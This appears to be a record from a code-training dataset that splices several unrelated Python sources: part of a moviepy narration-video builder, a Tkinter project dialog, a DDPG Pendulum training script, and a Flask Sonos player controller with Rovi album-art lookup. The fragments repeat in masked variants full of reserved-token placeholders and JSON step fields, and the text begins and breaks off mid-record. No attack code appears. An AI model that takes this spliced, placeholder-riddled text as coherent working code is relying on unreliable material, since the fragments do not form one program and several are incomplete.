AudioFileClip(clip_info.file, buffersize=400000)\n else:\n clip = clip_info.mpy_clip\n\n if clip_info.subclip is not None:\n clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])\n\n duration = clip_info.duration\n if duration is not None:\n if clip_info.loop:\n # pylint: disable=maybe-no-member\n clip = clip.fx(afx.audio_loop, duration=duration)\n else:\n duration = min(duration, clip.duration)\n if clip_info.subclip:\n duration = min(\n duration, clip_info.subclip[1] - clip_info.subclip[0]\n )\n clip = clip.set_duration(duration)\n\n if clip_info.start is not None:\n clip = clip.set_start(clip_info.start)\n\n # Adjust volume by keypoints\n if len(clip_info.vol_keypoints) > 0:\n clip = _adjust_mpy_audio_clip_volume(clip, clip_info.vol_keypoints)\n\n clips.append(clip)\n\n if len(clips) > 0:\n clip = CompositeAudioClip(clips)\n audio_clips.append(clip)\n\n if final_clip.audio:\n audio_clips.append(final_clip.audio)\n\n if len(audio_clips) > 0:\n final_audio_clip = CompositeAudioClip(audio_clips)\n\n # XXX: Workaround for exception: 'CompositeAudioClip' object has no attribute 'fps'.\n # See: https://github.com/Zulko/moviepy/issues/863\n # final_audio_clip.fps = 44100\n\n final_clip = final_clip.set_audio(final_audio_clip)\n\n # final_clip.show(10.5, interactive=True)\n\n os.makedirs(\"tmp/out\", exist_ok=True)\n\n if audio_only:\n final_audio_clip.fps = 44100\n final_audio_clip.write_audiofile(\"%s.mp3\" % out_filename)\n open_with(\"%s.mp3\" % out_filename, program_id=0)\n\n else:\n final_clip.write_videofile(\n \"%s.mp4\" % out_filename,\n temp_audiofile=\"%s.mp3\" % out_filename,\n remove_temp=False,\n codec=\"libx264\",\n threads=8,\n fps=coreapi.FPS,\n ffmpeg_params=[\"-crf\", \"19\"],\n )\n\n subprocess.Popen(\n [\"mpv\", \"--force-window\", \"--geometry=1920x1080\", f\"{out_filename}.mp4\"],\n close_fds=True,\n )\n\n\ndef _adjust_mpy_audio_clip_volume(clip, vol_keypoints):\n xp = []\n fp = []\n\n print(\"vol_keypoints:\", vol_keypoints)\n for (p, 
vol) in vol_keypoints:\n if isinstance(vol, (int, float)):\n xp.append(p)\n fp.append(vol)\n else:\n raise Exception(\"unsupported bgm parameter type:\" % type(vol))\n\n def volume_adjust(gf, t):\n factor = np.interp(t, xp, fp)\n factor = np.vstack([factor, factor]).T\n return factor * gf(t)\n\n return clip.fl(volume_adjust)\n\n\n# def _export_srt():\n# with open(\"out.srt\", \"w\", encoding=\"utf-8\") as f:\n# f.write(\"\\n\".join(_srt_lines))\n\n\ndef _convert_to_readable_time(seconds):\n seconds = int(seconds)\n seconds = seconds % (24 * 3600)\n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n\n if hour > 0:\n return \"%d:%02d:%02d\" % (hour, minutes, seconds)\n else:\n return \"%02d:%02d\" % (minutes, seconds)\n\n\ndef _write_timestamp(t, section_name):\n os.makedirs(os.path.dirname(out_filename), exist_ok=True)\n\n if not hasattr(_write_timestamp, \"f\"):\n _write_timestamp.f = open(\"%s.txt\" % out_filename, \"w\", encoding=\"utf-8\")\n\n _write_timestamp.f.write(\"%s (%s)\\n\" % (section_name, _convert_to_readable_time(t)))\n _write_timestamp.f.flush()\n\n\n@core.api\ndef include(file):\n with open(file, \"r\", encoding=\"utf-8\") as f:\n s = f.read()\n\n cwd = os.getcwd()\n os.chdir(os.path.dirname(os.path.abspath(file)))\n _parse_text(s)\n os.chdir(cwd)\n\n\ndef _remove_unused_recordings(s):\n used_recordings = set()\n unused_recordings = []\n\n apis = {\"record\": (lambda f, **kargs: used_recordings.add(f))}\n _parse_text(s, apis=apis)\n\n files = [f for f in glob.glob(\"record/*\") if os.path.isfile(f)]\n files = [f.replace(\"\\\\\", \"/\") for f in files]\n\n for f in files:\n if f not in used_recordings:\n unused_recordings.append(f)\n\n print2(\"Used : %d\" % len(used_recordings), color=\"green\")\n print2(\"Unused : %d\" % len(unused_recordings), color=\"red\")\n assert len(used_recordings) + len(unused_recordings) == len(files)\n print(\"Press y to clean up: \", end=\"\", flush=True)\n if getch() == \"y\":\n for f 
in unused_recordings:\n try:\n os.remove(f)\n except:\n print(\"WARNING: failed to remove: %s\" % f)\n\n\ndef _parse_text(text, apis=core.apis, **kwargs):\n def find_next(text, needle, p):\n pos = text.find(needle, p)\n if pos < 0:\n pos = len(text)\n return pos\n\n # Remove all comments\n text = re.sub(r\"<!--[\\d\\D]*?-->\", \"\", text)\n\n p = 0 # Current position\n while p < len(text):\n if text[p : p + 2] == \"{{\":\n end = find_next(text, \"}}\", p)\n python_code = text[p + 2 : end].strip()\n p = end + 2\n\n if ignore_undefined:\n try:\n exec(python_code, apis)\n except NameError: # API is not defined\n pass # simply ignore\n else:\n exec(python_code, apis)\n\n continue\n\n if text[p : p + 1] == \"#\":\n end = find_next(text, \"\\n\", p)\n\n line = text[p:end].strip()\n _write_timestamp(coreapi.pos_dict[\"a\"], line)\n\n p = end + 1\n continue\n\n match = re.match(\"---((?:[0-9]*[.])?[0-9]+)?\\n\", text[p:])\n if match is not None:\n if match.group(1) is not None:\n coreapi.audio_gap(float(match.group(1)))\n else:\n coreapi.audio_gap(0.2)\n p += match.end(0) + 1\n continue\n\n # Parse regular text\n end = find_next(text, \"\\n\", p)\n line = text[p:end].strip()\n p = end + 1\n\n if line != \"\" and \"parse_line\" in apis:\n apis[\"parse_line\"](line)\n\n # Call it at the end\n core.on_api_func(None)\n\n\ndef _show_stats(s):\n TIME_PER_CHAR = 0.1334154351395731\n\n total = 0\n\n def parse_line(line):\n nonlocal total\n total += len(line)\n\n _parse_text(s, apis={\"parse_line\": parse_line}, ignore_undefined=True)\n\n total_secs = TIME_PER_CHAR * total\n print(\"Estimated Time: %s\" % format_time(total_secs))\n\n input()\n\n\ndef load_config():\n import yaml\n\n CONFIG_FILE = \"config.yaml\"\n DEFAULT_CONFIG = {\"fps\": 30}\n\n if os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, \"r\") as f:\n config = yaml.load(f.read(), Loader=yaml.FullLoader)\n else:\n with open(CONFIG_FILE, \"w\", newline=\"\\n\") as f:\n yaml.dump(DEFAULT_CONFIG, f, 
default_flow_style=False)\n config = DEFAULT_CONFIG\n\n coreapi.fps(config[\"fps\"])\n\n\nif __name__ == \"__main__\":\n out_filename = \"tmp/out/\" + get_time_str()\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--stdin\", default=False, action=\"store_true\")\n parser.add_argument(\"--proj_dir\", type=str, default=None)\n parser.add_argument(\"-i\", \"--input\", type=str, default=None)\n parser.add_argument(\"-a\", \"--audio_only\", action=\"store_true\", default=False)\n parser.add_argument(\n \"--remove_unused_recordings\", action=\"store_true\", default=False\n )\n parser.add_argument(\"--show_stats\", action=\"store_true\", default=False)\n parser.add_argument(\"--preview\", action=\"store_true\", default=False)\n\n args = parser.parse_args()\n\n if args.proj_dir is not None:\n os.chdir(args.proj_dir)\n elif args.input:\n os.chdir(os.path.dirname(args.input))\n print(\"Project dir: %s\" % os.getcwd())\n\n # Load custom APIs (api.py) if exists\n if os.path.exists(\"api.py\"):\n sys.path.append(os.getcwd())\n mymodule = importlib.import_module(\"api\")\n global_functions = inspect.getmembers(mymodule, inspect.isfunction)\n core.apis.update({k: v for k, v in global_functions})\n\n # HACK\n if args.audio_only:\n coreapi.audio_only()\n\n # Read text\n if args.stdin:\n s = sys.stdin.read()\n\n elif args.input:\n with open(args.input, \"r\", encoding=\"utf-8\") as f:\n s = f.read()\n\n else:\n raise Exception(\"Either --stdin or --input should be specified.\")\n\n load_config()\n\n if args.preview:\n coreapi.preview()\n\n if args.remove_unused_recordings:\n ignore_undefined = True\n _remove_unused_recordings(s)\n elif args.show_stats:\n ignore_undefined = True\n _show_stats(s)\n else:\n _parse_text(s, apis=core.apis)\n _export_video(resolution=(1920, 1080), audio_only=args.audio_only)\n",
"step-ids": [
8,
9,
10,
12,
15
]
}
|
[
8,
9,
10,
12,
15
] |
<|reserved_special_token_0|>
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
<|reserved_special_token_0|>
def apply(self):
"""
called when ok button is pressed
"""
self.output = {'name': self.form.values[0], 'width': self.form.
values[1], 'height': self.form.values[2], 'bgcolor': self.form.
values[3], 'fullscreen': self.form.values[4]}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self, title=
'Wrong data', message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self, title=
'Project title', message='Invalid project name')
return False
return True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
def body(self, master):
initial_values = ['', 640, 480, '#dadada', False]
if self._dict:
initial_values = [self._dict.get('name'), self._dict.get(
'width'), self._dict.get('height'), self._dict.get(
'bgcolor'), self._dict.get('fullscreen')]
self.form = boring.form.FormFrame(master, FORMSTRING,
initial_values=initial_values, title='%s Project' % ('Edit' if
self._dict else 'New'))
self.form.grid(pady=10, padx=10)
return self.form.inputs[0]
def apply(self):
"""
called when ok button is pressed
"""
self.output = {'name': self.form.values[0], 'width': self.form.
values[1], 'height': self.form.values[2], 'bgcolor': self.form.
values[3], 'fullscreen': self.form.values[4]}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self, title=
'Wrong data', message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self, title=
'Project title', message='Invalid project name')
return False
return True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
FORMSTRING = """
Project name@string
Width@int|Height@int
Background color@color
Fullscreen@check
"""
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
def body(self, master):
initial_values = ['', 640, 480, '#dadada', False]
if self._dict:
initial_values = [self._dict.get('name'), self._dict.get(
'width'), self._dict.get('height'), self._dict.get(
'bgcolor'), self._dict.get('fullscreen')]
self.form = boring.form.FormFrame(master, FORMSTRING,
initial_values=initial_values, title='%s Project' % ('Edit' if
self._dict else 'New'))
self.form.grid(pady=10, padx=10)
return self.form.inputs[0]
def apply(self):
"""
called when ok button is pressed
"""
self.output = {'name': self.form.values[0], 'width': self.form.
values[1], 'height': self.form.values[2], 'bgcolor': self.form.
values[3], 'fullscreen': self.form.values[4]}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self, title=
'Wrong data', message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self, title=
'Project title', message='Invalid project name')
return False
return True
<|reserved_special_token_1|>
import boring.dialog
import boring.form
FORMSTRING = """
Project name@string
Width@int|Height@int
Background color@color
Fullscreen@check
"""
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
def body(self, master):
initial_values = ['', 640, 480, '#dadada', False]
if self._dict:
initial_values = [self._dict.get('name'), self._dict.get(
'width'), self._dict.get('height'), self._dict.get(
'bgcolor'), self._dict.get('fullscreen')]
self.form = boring.form.FormFrame(master, FORMSTRING,
initial_values=initial_values, title='%s Project' % ('Edit' if
self._dict else 'New'))
self.form.grid(pady=10, padx=10)
return self.form.inputs[0]
def apply(self):
"""
called when ok button is pressed
"""
self.output = {'name': self.form.values[0], 'width': self.form.
values[1], 'height': self.form.values[2], 'bgcolor': self.form.
values[3], 'fullscreen': self.form.values[4]}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self, title=
'Wrong data', message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self, title=
'Project title', message='Invalid project name')
return False
return True
<|reserved_special_token_1|>
import boring.dialog
import boring.form
FORMSTRING = '''
Project name@string
Width@int|Height@int
Background color@color
Fullscreen@check
'''
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
def body(self, master):
initial_values = [
'',
640, 480,
'#dadada',
False
]
if self._dict:
initial_values = [
self._dict.get('name'),
self._dict.get('width'), self._dict.get('height'),
self._dict.get('bgcolor'),
self._dict.get('fullscreen')
]
self.form = boring.form.FormFrame(master, FORMSTRING, initial_values=initial_values, title='%s Project' % ('Edit' if self._dict else 'New'))
self.form.grid(pady=10, padx=10)
return self.form.inputs[0]
def apply(self):
'''
called when ok button is pressed
'''
self.output = {
'name': self.form.values[0],
'width': self.form.values[1],
'height': self.form.values[2],
'bgcolor': self.form.values[3],
'fullscreen': self.form.values[4]
}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self,
title='Wrong data',
message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self,
title='Project title',
message='Invalid project name')
return False
return True
|
flexible
|
{
"blob_id": "76420ec1b37d4b9b85f35764a7f8a0e1f19a15dd",
"index": 5745,
"step-1": "<mask token>\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n <mask token>\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-2": "<mask token>\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-3": "<mask token>\nFORMSTRING = \"\"\"\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n\"\"\"\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-4": "import boring.dialog\nimport boring.form\nFORMSTRING = \"\"\"\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n\"\"\"\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-5": "import boring.dialog\nimport boring.form\n\nFORMSTRING = '''\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n'''\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = [\n '',\n 640, 480,\n '#dadada',\n False\n ]\n if self._dict:\n initial_values = [\n self._dict.get('name'),\n self._dict.get('width'), self._dict.get('height'),\n self._dict.get('bgcolor'),\n self._dict.get('fullscreen')\n ]\n self.form = boring.form.FormFrame(master, FORMSTRING, initial_values=initial_values, title='%s Project' % ('Edit' if self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n\n return self.form.inputs[0]\n\n def apply(self):\n '''\n called when ok button is pressed\n '''\n self.output = {\n 'name': self.form.values[0],\n 'width': self.form.values[1],\n 'height': self.form.values[2],\n 'bgcolor': self.form.values[3],\n 'fullscreen': self.form.values[4]\n }\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self,\n title='Wrong data',\n message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self,\n title='Project title',\n message='Invalid project name')\n return False\n return True",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
env = gym.make('Pendulum-v0')
log_dir = 'log/pendulum'
agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,
batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)
agent.train()
agent.eval_all(log_dir + '/models', num_eps=10)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
env = gym.make('Pendulum-v0')
log_dir = 'log/pendulum'
agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,
batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)
agent.train()
agent.eval_all(log_dir + '/models', num_eps=10)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import gym
from ddpg import DDPG
def main():
env = gym.make('Pendulum-v0')
log_dir = 'log/pendulum'
agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,
batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)
agent.train()
agent.eval_all(log_dir + '/models', num_eps=10)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import gym
from ddpg import DDPG
def main():
#env = gym.make('LunarLanderContinuous-v2')
#log_dir = 'log/lander'
env = gym.make('Pendulum-v0')
log_dir = 'log/pendulum'
# paper settings
# agent = DDPG(env, sigma=0.2, num_episodes=1000, buffer_size=1000000, batch_size=64,
# tau=1e-3, batch_norm=True, merge_layer=2)
# did not work unless I merged action into critic at first layer
# worked btter without batchnorm
agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000, batch_size=64,
tau=1e-3, batch_norm=False, merge_layer=0)
agent.train()
agent.eval_all(log_dir+'/models', num_eps=10)
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "153e7e66e2b796d011b78aed102d30e37bb0b80f",
"index": 1374,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n env = gym.make('Pendulum-v0')\n log_dir = 'log/pendulum'\n agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,\n batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)\n agent.train()\n agent.eval_all(log_dir + '/models', num_eps=10)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n env = gym.make('Pendulum-v0')\n log_dir = 'log/pendulum'\n agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,\n batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)\n agent.train()\n agent.eval_all(log_dir + '/models', num_eps=10)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import gym\nfrom ddpg import DDPG\n\n\ndef main():\n env = gym.make('Pendulum-v0')\n log_dir = 'log/pendulum'\n agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,\n batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)\n agent.train()\n agent.eval_all(log_dir + '/models', num_eps=10)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import gym\r\nfrom ddpg import DDPG\r\n\r\ndef main():\r\n #env = gym.make('LunarLanderContinuous-v2')\r\n #log_dir = 'log/lander'\r\n\r\n env = gym.make('Pendulum-v0')\r\n log_dir = 'log/pendulum'\r\n\r\n # paper settings\r\n # agent = DDPG(env, sigma=0.2, num_episodes=1000, buffer_size=1000000, batch_size=64, \r\n # tau=1e-3, batch_norm=True, merge_layer=2)\r\n\r\n # did not work unless I merged action into critic at first layer\r\n # worked btter without batchnorm\r\n agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000, batch_size=64, \r\n tau=1e-3, batch_norm=False, merge_layer=0)\r\n agent.train()\r\n agent.eval_all(log_dir+'/models', num_eps=10)\r\n\r\nif __name__ == '__main__':\r\n main()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def gen_sig():
"""@brief return the MD5 checksum """
return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[
'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')
).hexdigest()
def get_track_image(artist, album):
"""@brief get the track image from Rovi """
blank_image = url_for('static', filename='img/blank.jpg')
if 'ROVI_SHARED_SECRET' not in app.config:
return blank_image
if 'ROVI_API_KEY' not in app.config:
return blank_image
headers = {'Accept-Encoding': 'gzip'}
req = requests.get(
'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +
app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +
album + '&performername=' + artist + '&include=images&size=1',
headers=headers, timeout=30)
if req.status_code != requests.codes.ok:
return blank_image
result = json.loads(req.content)
try:
return result['matchResponse']['results'][0]['album']['images'][0][
'front'][3]['url']
except (KeyError, IndexError):
return blank_image
def current_track():
"""@brief get the current track information from Sonos """
track = sonos.get_current_track_info()
track['title'] = track['title'][:30]
track['artist'] = track['artist'][:30]
return track
@app.route('/play')
def play():
"""@brief the play function """
sonos.play()
return 'Ok'
@app.route('/pause')
def pause():
"""@brief the pause function """
sonos.pause()
return 'Ok'
@app.route('/following')
def following():
"""@brief the following function """
sonos.next()
return 'Ok'
@app.route('/previous')
def previous():
"""@brief the previous function """
sonos.previous()
return 'Ok'
@app.route('/volume')
def volume():
"""@brief get the actual volume """
vol = sonos.volume
return vol
@app.route('/volume_up')
def volume_up():
"""@brief the volume up function """
sonos.set_relative_volume(10)
return 'Ok'
@app.route('/volume_down')
def volume_down():
"""@brief the volume down function """
sonos.set_relative_volume(-10)
return 'Ok'
@app.route('/volume_mute')
def volume_mute():
"""@brief the mute function """
sonos.mute = True
return 'Ok'
@app.route('/volume_unmute')
def volume_unmute():
"""@brief the unmute function """
sonos.mute = False
return 'Ok'
<|reserved_special_token_0|>
@app.route('/track_02')
def track_02():
"""@brief switch to new track """
sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',
title='Radio PSR Live', force_radio=True)
return 'Ok'
<|reserved_special_token_0|>
@app.route('/track_04')
def track_04():
"""@brief switch to new track """
sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=
'Sunshine Live', force_radio=True)
return 'Ok'
@app.route('/info-light')
def info_light():
"""@brief the info-light function """
track = current_track()
return json.dumps(track)
@app.route('/info')
def info():
"""@brief the info function """
track = current_track()
track['image'] = get_track_image(track['artist'], track['album'])
transport = sonos.get_current_transport_info()
track['playing'] = transport['current_transport_state'] != 'STOPPED'
track['mute'] = sonos.mute
return json.dumps(track)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gen_sig():
"""@brief return the MD5 checksum """
return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[
'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')
).hexdigest()
def get_track_image(artist, album):
"""@brief get the track image from Rovi """
blank_image = url_for('static', filename='img/blank.jpg')
if 'ROVI_SHARED_SECRET' not in app.config:
return blank_image
if 'ROVI_API_KEY' not in app.config:
return blank_image
headers = {'Accept-Encoding': 'gzip'}
req = requests.get(
'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +
app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +
album + '&performername=' + artist + '&include=images&size=1',
headers=headers, timeout=30)
if req.status_code != requests.codes.ok:
return blank_image
result = json.loads(req.content)
try:
return result['matchResponse']['results'][0]['album']['images'][0][
'front'][3]['url']
except (KeyError, IndexError):
return blank_image
def current_track():
"""@brief get the current track information from Sonos """
track = sonos.get_current_track_info()
track['title'] = track['title'][:30]
track['artist'] = track['artist'][:30]
return track
@app.route('/play')
def play():
"""@brief the play function """
sonos.play()
return 'Ok'
@app.route('/pause')
def pause():
"""@brief the pause function """
sonos.pause()
return 'Ok'
@app.route('/following')
def following():
"""@brief the following function """
sonos.next()
return 'Ok'
@app.route('/previous')
def previous():
"""@brief the previous function """
sonos.previous()
return 'Ok'
@app.route('/volume')
def volume():
"""@brief get the actual volume """
vol = sonos.volume
return vol
@app.route('/volume_up')
def volume_up():
"""@brief the volume up function """
sonos.set_relative_volume(10)
return 'Ok'
@app.route('/volume_down')
def volume_down():
"""@brief the volume down function """
sonos.set_relative_volume(-10)
return 'Ok'
@app.route('/volume_mute')
def volume_mute():
"""@brief the mute function """
sonos.mute = True
return 'Ok'
@app.route('/volume_unmute')
def volume_unmute():
"""@brief the unmute function """
sonos.mute = False
return 'Ok'
@app.route('/track_01')
def track_01():
"""@brief switch to new track """
sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=
'FM4.ORF.AT', force_radio=True)
return 'Ok'
@app.route('/track_02')
def track_02():
"""@brief switch to new track """
sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',
title='Radio PSR Live', force_radio=True)
return 'Ok'
<|reserved_special_token_0|>
@app.route('/track_04')
def track_04():
"""@brief switch to new track """
sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=
'Sunshine Live', force_radio=True)
return 'Ok'
@app.route('/info-light')
def info_light():
"""@brief the info-light function """
track = current_track()
return json.dumps(track)
@app.route('/info')
def info():
"""@brief the info function """
track = current_track()
track['image'] = get_track_image(track['artist'], track['album'])
transport = sonos.get_current_transport_info()
track['playing'] = transport['current_transport_state'] != 'STOPPED'
track['mute'] = sonos.mute
return json.dumps(track)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gen_sig():
"""@brief return the MD5 checksum """
return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[
'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')
).hexdigest()
def get_track_image(artist, album):
"""@brief get the track image from Rovi """
blank_image = url_for('static', filename='img/blank.jpg')
if 'ROVI_SHARED_SECRET' not in app.config:
return blank_image
if 'ROVI_API_KEY' not in app.config:
return blank_image
headers = {'Accept-Encoding': 'gzip'}
req = requests.get(
'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +
app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +
album + '&performername=' + artist + '&include=images&size=1',
headers=headers, timeout=30)
if req.status_code != requests.codes.ok:
return blank_image
result = json.loads(req.content)
try:
return result['matchResponse']['results'][0]['album']['images'][0][
'front'][3]['url']
except (KeyError, IndexError):
return blank_image
